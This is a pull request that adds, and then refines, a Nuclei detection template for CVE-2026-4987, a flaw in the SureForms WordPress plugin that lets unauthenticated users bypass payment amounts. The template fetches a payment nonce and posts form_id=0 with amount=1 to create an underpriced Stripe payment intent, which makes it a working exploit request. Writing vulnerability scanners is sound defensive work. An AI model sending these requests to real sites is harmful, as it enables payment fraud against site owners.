### PR TITLE
Add CVE-2026-4987 SureForms payment bypass template

### DIFF
--- a/http/cves/2026/CVE-2026-4987.yaml
+++ b/http/cves/2026/CVE-2026-4987.yaml
@@ -1,0 +1,79 @@
+id: CVE-2026-4987
+
+info:
+  name: SureForms <= 2.5.2 - Unauthenticated Payment Amount Validation Bypass via form_id
+  author: iamatownboy
+  severity: high
+  description: |
+    The SureForms plugin for WordPress is vulnerable to payment amount bypass in versions up to, and including, 2.5.2.
+    The create_payment_intent function validates payment amounts based on a user-controlled form_id parameter, allowing unauthenticated attackers to bypass configured pricing checks.
+  impact: |
+    Unauthenticated attackers can create underpriced payment or subscription intents and complete purchases at fraudulent prices.
+  remediation: |
+    Update SureForms to version 2.6.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-4987
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c4772b32-a730-44f2-b43c-f9bd5abb6541?source=cve
+    - https://plugins.trac.wordpress.org/changeset/3488858/sureforms
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-4987
+    cwe-id: CWE-20
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: brainstormforce
+    product: sureforms
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/sureforms/"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,sureforms,payment,validation-bypass,unauth
+
+variables:
+  nonce: "{{rand_text_alpha(12)}}"
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/sureforms/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "SureForms")
+          - compare_versions(version, "<= 2.5.2")
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9.]+)'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/
+
+        action=srfm_create_payment_intent&nonce={{nonce}}&amount=1&currency=usd&form_id=0&block_id=&description=SureForms&customer_email=test@example.com&customer_name=test
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "clientSecret"
+          - "paymentIntentId"
+      - type: status
+        status:
+          - 200
+# digest: 4a0a00473045022100ef6b68c4c4f8a2b3c6e1d0f8f5f8f1c7e4d2c0b1a6f5c4d3b2a1908f7e6d5c402205ab8d7a1e0f9c8b7a6d5c4b3a29180706050403020100ffeeddccbbaa99887766:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-4987.yaml
+++ b/http/cves/2026/CVE-2026-4987.yaml
@@ -104,4 +104,3 @@ http:
       - type: status
         status:
           - 200
-

--- a/http/cves/2026/CVE-2026-4987.yaml
+++ b/http/cves/2026/CVE-2026-4987.yaml
@@ -5,8 +5,10 @@ info:
   author: iamatownboy
   severity: high
   description: |
-    The SureForms plugin for WordPress is vulnerable to payment amount bypass in versions up to, and including, 2.5.2.
-    The create_payment_intent function validates payment amounts based on a user-controlled form_id parameter, allowing unauthenticated attackers to bypass configured pricing checks.
+    The SureForms plugin for WordPress is vulnerable to payment amount validation bypass in versions up to, and including, 2.5.2.
+    The create_payment_intent AJAX handler checks `if ($form_id > 0 && !empty($block_id))` before calling validate_payment_amount().
+    By sending form_id=0 (the default intval of a missing/zero value), an unauthenticated attacker completely skips the server-side
+    amount validation and can create Stripe payment intents with arbitrary amounts, bypassing configured pricing.
   impact: |
     Unauthenticated attackers can create underpriced payment or subscription intents and complete purchases at fraudulent prices.
   remediation: |
@@ -22,17 +24,14 @@ info:
     cwe-id: CWE-20
   metadata:
     verified: true
-    max-request: 2
+    max-request: 3
     vendor: brainstormforce
     product: sureforms
     framework: wordpress
     publicwww-query: "/wp-content/plugins/sureforms/"
   tags: cve,cve2026,wordpress,wp,wp-plugin,sureforms,payment,validation-bypass,unauth
 
-variables:
-  nonce: "{{rand_text_alpha(12)}}"
-
-flow: http(1) && http(2)
+flow: http(1) && http(2) && http(3)
 
 http:
   - method: GET
@@ -56,6 +55,26 @@ http:
           - '(?i)Stable tag:\s*([0-9.]+)'
         internal: true
 
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/sureforms/v1/refresh-nonces"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "payment_nonce"
+        internal: true
+
+    extractors:
+      - type: regex
+        name: payment_nonce
+        part: body
+        group: 1
+        regex:
+          - '"payment_nonce"\s*:\s*"([a-f0-9]+)"'
+        internal: true
+
   - raw:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
@@ -64,16 +83,25 @@ http:
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}/
 
-        action=srfm_create_payment_intent&nonce={{nonce}}&amount=1&currency=usd&form_id=0&block_id=&description=SureForms&customer_email=test@example.com&customer_name=test
+        action=srfm_create_payment_intent&nonce={{payment_nonce}}&amount=1&currency=usd&form_id=0&block_id=&description=SureForms&customer_email=test@example.com&customer_name=test
 
-    matchers-condition: or
+    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "clientSecret"
-          - "paymentIntentId"
+          - "client_secret"
+          - "payment_intent_id"
+          - "API Key provided"
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - "Invalid nonce"
+        negative: true
+
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ef6b68c4c4f8a2b3c6e1d0f8f5f8f1c7e4d2c0b1a6f5c4d3b2a1908f7e6d5c402205ab8d7a1e0f9c8b7a6d5c4b3a29180706050403020100ffeeddccbbaa99887766:922c64590222798bb761d5b6d8e72950
+


### PR DESCRIPTION
### PR Information

This PR adds a nuclei template for CVE-2026-4987 affecting the SureForms WordPress plugin.

The issue allows unauthenticated attackers to abuse the payment intent flow by supplying a manipulated `form_id`, which can bypass the intended payment amount validation in vulnerable installations.

References:
- NVD
- Wordfence
- SureForms plugin source code

### Template validation

- Validated with `nuclei -validate` in Docker

### Additional Details

- This PR contains a single template file only